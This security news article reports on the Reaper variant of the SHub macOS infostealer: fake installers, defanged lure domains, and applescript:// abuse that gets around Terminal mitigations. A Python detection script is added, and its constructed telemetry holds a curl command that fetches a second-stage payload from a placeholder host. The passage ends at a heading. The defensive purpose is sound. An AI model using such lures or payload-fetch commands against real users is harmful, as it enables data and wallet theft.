
SHub macOS infostealer variant spoofs Apple security updates

Why This Matters

The new SHub macOS infostealer variant, Reaper, demonstrates evolving tactics by using AppleScript to bypass recent security measures, posing a significant threat to Mac users. Its ability to steal sensitive data, hijack crypto wallets, and evade detection underscores the need for enhanced cybersecurity awareness and defenses in the tech industry. This development highlights the ongoing arms race between cybercriminals and security providers, emphasizing the importance of robust, multi-layered security strategies for consumers and organizations alike.

Key Takeaways

A new variant of the ‘SHub’ macOS infostealer uses AppleScript to show a fake security update message and installs a backdoor.

Dubbed Reaper, the new version steals sensitive browser data, collects documents and files that may contain financial details, and hijacks crypto wallet apps.

Unlike earlier SHub campaigns that relied on “ClickFix” tactics, tricking users into pasting and executing commands in Terminal, Reaper relies on the applescript:// URL scheme to launch the macOS Script Editor preloaded with a malicious AppleScript.

This approach bypasses the Terminal-based mitigations Apple introduced in late March with macOS Tahoe 26.4, which blocked pasting and executing potentially harmful commands.

SentinelOne researchers identified the new SHub infostealer variant and found that users were lured with a fake installer for WeChat and Miro applications hosted on domains made to appear legitimate to less experienced users (e.g., qq-0732gwh22[.]com, mlcrosoft[.]co[.]com, mlroweb[.]com).

Currently, the fake QQ and Microsoft domains still serve fake WeChat installers, while the one impersonating the Miro visual collaboration platform redirects to the legitimate website.

BleepingComputer noticed that download buttons for Windows and Android serve the same executable hosted in a Dropbox account.

Before invoking the AppleScript, the malicious websites fingerprint the visitor's device to check for virtual machines and VPNs, which may indicate an analysis machine, and enumerate installed browser extensions for password managers and cryptocurrency wallets. All telemetry data is delivered to the attacker via a Telegram bot.

SentinelOne's report today notes that the script with the command that fetches the payload is constructed dynamically and hidden under ASCII art.
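The behaviour described above (a browser handing an applescript:// URL to Script Editor, which then runs a shell command that fetches the payload) leaves a process chain a defender can look for. The following Python is an added example, not code from SentinelOne, BleepingComputer or the malware author: it runs two simple rules over endpoint telemetry and correlates them. The JSON-lines event format, the sample events, the process names and the applescript:// query parameters are all constructed for illustration and are not taken from the report.

```python
"""Detection sketch for the "fake update via applescript://" chain.

Added example. Assumes a constructed telemetry format: one JSON object per
line with a "type" of either "process_start" (pid, ppid, process, args) or
"url_open" (pid of the opening process, url). Real EDR/unified-log fields
will differ; adapt the field names in parse_events().
"""
import json

BROWSERS = {"Safari", "Google Chrome", "Firefox", "Microsoft Edge", "Arc", "Brave Browser"}
SCRIPT_EDITOR = "Script Editor"
# Processes that, when spawned underneath Script Editor, suggest a
# "do shell script" reaching out for a second stage.
SHELLS_AND_FETCHERS = {"sh", "bash", "zsh", "curl", "osascript"}
CORRELATION_WINDOW_S = 300

# Constructed sample telemetry (not real captured data). The URL's query
# string is a placeholder, not the real lure.
SAMPLE_TELEMETRY = """\
{"ts": 100, "type": "process_start", "pid": 1, "ppid": 0, "process": "launchd", "args": []}
{"ts": 101, "type": "process_start", "pid": 410, "ppid": 1, "process": "Safari", "args": []}
{"ts": 102, "type": "url_open", "pid": 410, "url": "https://example.invalid/download"}
{"ts": 103, "type": "url_open", "pid": 410, "url": "applescript://com.apple.scripteditor?action=new&script=CONSTRUCTED_PLACEHOLDER"}
{"ts": 104, "type": "process_start", "pid": 520, "ppid": 1, "process": "Script Editor", "args": []}
{"ts": 105, "type": "process_start", "pid": 521, "ppid": 520, "process": "sh", "args": ["-c", "curl -fsSL https://example.invalid/stage2 -o /tmp/stage2"]}
{"ts": 106, "type": "process_start", "pid": 522, "ppid": 521, "process": "curl", "args": ["-fsSL", "https://example.invalid/stage2", "-o", "/tmp/stage2"]}
{"ts": 107, "type": "process_start", "pid": 600, "ppid": 1, "process": "Terminal", "args": []}
{"ts": 108, "type": "process_start", "pid": 601, "ppid": 600, "process": "zsh", "args": []}
"""


def parse_events(text):
    """Parse JSON-lines telemetry into a list of dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def build_process_tree(events):
    """Map pid -> ppid and pid -> process name from process_start events."""
    parent, name = {}, {}
    for e in events:
        if e["type"] == "process_start":
            parent[e["pid"]] = e["ppid"]
            name[e["pid"]] = e["process"]
    return parent, name


def ancestor_names(pid, parent, name, limit=32):
    """Return the names of pid's ancestors, nearest first, guarding against cycles."""
    chain, seen = [], set()
    while pid in parent and pid not in seen and len(chain) < limit:
        seen.add(pid)
        pid = parent[pid]
        if pid in name:
            chain.append(name[pid])
    return chain


def detect(events):
    """Apply both rules and return a list of finding dicts."""
    parent, name = build_process_tree(events)
    findings = []
    for e in events:
        # Rule 1: a browser opened an applescript: URL. This is the point where
        # Script Editor gets preloaded, before the user has clicked Run.
        if e["type"] == "url_open" and e["url"].lower().startswith("applescript:"):
            if name.get(e["pid"]) in BROWSERS:
                findings.append({"rule": "applescript_url_from_browser", "severity": "medium",
                                 "ts": e["ts"], "pid": e["pid"], "detail": e["url"][:80]})
        # Rule 2: a shell or fetcher started with Script Editor somewhere above it.
        # Because macOS launches the app via launchd, the browser is NOT the
        # parent; the useful ancestor to key on is Script Editor itself.
        elif e["type"] == "process_start" and e["process"] in SHELLS_AND_FETCHERS:
            if SCRIPT_EDITOR in ancestor_names(e["pid"], parent, name):
                findings.append({"rule": "shell_spawned_under_script_editor", "severity": "high",
                                 "ts": e["ts"], "pid": e["pid"], "detail": " ".join(e["args"])[:80]})
    # Correlation: both rules within a short window is the full chain.
    url_ts = [f["ts"] for f in findings if f["rule"] == "applescript_url_from_browser"]
    shell_ts = [f["ts"] for f in findings if f["rule"] == "shell_spawned_under_script_editor"]
    if any(0 <= s - u <= CORRELATION_WINDOW_S for u in url_ts for s in shell_ts):
        findings.append({"rule": "correlated_applescript_lure_chain", "severity": "critical",
                         "ts": max(shell_ts), "pid": None, "detail": "url_open followed by shell under Script Editor"})
    return findings


if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_TELEMETRY)):
        print(f"[{f['severity']:>8}] ts={f['ts']} pid={f['pid']} {f['rule']}: {f['detail']}")
```

The benign zsh under Terminal in the sample is deliberately left alone: the point of keying on Script Editor rather than on shells in general is to avoid paging on ordinary developer activity, while still catching the chain regardless of whether the ClickFix-style Terminal path is blocked.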

The malicious AppleScript
